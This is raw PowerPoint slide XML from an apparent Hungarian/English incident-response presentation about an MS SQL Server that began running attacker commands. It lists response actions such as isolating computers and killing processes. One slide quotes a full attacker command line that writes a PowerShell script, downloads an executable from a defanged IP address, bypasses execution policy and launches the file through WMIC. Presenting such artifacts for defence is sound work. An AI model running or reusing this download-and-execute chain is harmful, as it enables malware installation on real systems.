            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="10272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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3809723" y="543775"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="46" name="Group 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="48" name="Group 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="52" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="53" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="54" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="55" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="49" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Oval 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600139" y="893635"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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91958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3B66EA-8AE1-1BDC-EFEB-DD68E16F2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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE54B550-98B9-6794-D9DF-BC820EF252B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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC00897-EDEE-C40A-BE86-F521180430C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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE18698D-E4E7-2CA2-716F-0AD03CDD26F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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A603E0F-57D2-1139-A6F0-41FC81168CA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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0C8433-F0C0-CA7C-CAB1-7573158883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78127" y="-67586"/>
            <a:ext cx="13425772" cy="10189508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="122" name="Group 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D93E76C9-3F98-9C3D-924C-8B984296FCEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="3550739"/>
            <a:ext cx="16459200" cy="3185521"/>
            <a:chOff x="914400" y="2120365"/>
            <a:chExt cx="16459200" cy="3185521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1CBD8B4-0D1C-D773-46C6-FFD99D673E62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="2120365"/>
              <a:ext cx="16459200" cy="3185521"/>
              <a:chOff x="9783551" y="1103017"/>
              <a:chExt cx="16459200" cy="3185521"/>
            </a:xfrm>
          </p:grpSpPr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1DD86983-3DEC-6AF0-3EF6-D1DD0F528D18}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103017"/>
                <a:ext cx="16459200" cy="3185521"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Graphic 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A11368A-91AF-95C0-503F-88E5CAFF08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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D560FBC-3A67-2D07-3BB1-558DF3A34D47}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1818602"/>
                <a:ext cx="16134415" cy="2395843"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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%SYSTEM%\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”C:\Windows\\System32\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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” /C echo $cl = New-Object </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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System.Net.WebClient</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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&gt;C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\updt.ps1 &amp; echo $</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cl.DownloadFile</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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(“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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hxxp</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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://80.66.75[.]47/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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Dxccaejs.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”, ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”) &gt;&gt; C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\updt.ps1 &amp; </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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powershell</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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–</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ExecutionPolicy</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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Bypass C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\updt.ps1 &amp; WMIC process call create ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0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”</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EF2302E-AE33-1758-F8D4-BC2E841904A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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28BFB43-AB14-00F1-D231-85D70567B2B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8630343" y="-992671"/>
            <a:ext cx="3841620" cy="483282"/>
            <a:chOff x="11839730" y="3389691"/>
            <a:chExt cx="3841620" cy="483282"/>
          </a:xfrm>
        </p:grpSpPr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B42B2D0B-C390-9C4E-0418-46504B2F2652}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11839730" y="3390371"/>
              <a:ext cx="3663949" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274CC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51" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FAAE3DC-9F2A-EECF-73E2-EDFF42AAD2AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12438063" y="3389691"/>
              <a:ext cx="3243287" cy="483282"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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powershell.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(16656)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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C5EA5CDD-E99B-568F-70EF-D482DC71D1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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11974098" y="3482196"/>
              <a:ext cx="347807" cy="260855"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="TextBox 124">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E50917F1-F66E-CD70-0A96-AB19920494C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832988" y="2344897"/>
            <a:ext cx="158631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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS SQL server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parancsokat kezdett futtatni</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="5400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="54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F2BF3B-FAD7-CAF5-CEE9-7AB6A1534EFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-63432" y="10462868"/>
            <a:ext cx="18584214" cy="5660425"/>
            <a:chOff x="-63432" y="4641174"/>
            <a:chExt cx="18584214" cy="566042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ED6A078-1CCA-D60D-5642-9C5C9F8D47B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-63432" y="4641174"/>
              <a:ext cx="18584214" cy="5660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54E2EBE-EC3A-5E15-0526-D5046F607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t="1037" b="-833"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="969716" y="5215950"/>
              <a:ext cx="16517919" cy="4071609"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="00717F"/>
              </a:solidFill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978547A-0F05-6024-A281-3D48283F3C74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="19036678" y="696324"/>
            <a:ext cx="3689914" cy="4302895"/>
            <a:chOff x="5295013" y="1531088"/>
            <a:chExt cx="6528391" cy="7612912"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="281331" dist="707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11AFF91-5E93-B21E-3E3C-51279AC5B0C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5295013" y="1531088"/>
              <a:ext cx="6528391" cy="6444512"/>
              <a:chOff x="5295013" y="1531088"/>
              <a:chExt cx="6528391" cy="6444512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41D01485-E904-F39C-167D-E868E5AF2216}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5295013" y="1531088"/>
                <a:ext cx="6528391" cy="6444512"/>
                <a:chOff x="5295013" y="1531088"/>
                <a:chExt cx="6528391" cy="6444512"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="33" name="Triangle 32">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ED3077D-30B0-9BB7-6594-D3A029554CCA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="8322990" y="7676707"/>
                  <a:ext cx="491067" cy="298893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34" name="Rounded Rectangle 33">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E288843-3C90-5DBD-C302-385797370D60}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5295013" y="1531088"/>
                  <a:ext cx="6528391" cy="6145619"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 1096"/>
                  </a:avLst>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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</p:grp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A784E0A-298C-A71E-46AC-BE929EFBA7F9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5660289" y="1679946"/>
                <a:ext cx="3314628" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Incident actions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D4E06A2-8452-5C63-7660-AD4B6B7B8C88}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="2583703"/>
                <a:ext cx="3625238" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Isolate computers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BC71685-4E7B-44ED-B400-07A33C288CC0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="3458445"/>
                <a:ext cx="4604948" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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End computer isolation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3216926-A231-AD32-D850-3561294E2ED8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="4674038"/>
                <a:ext cx="2789719" cy="707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Kill processes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C32A4C3-332A-B339-CDE5-3874349982BD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
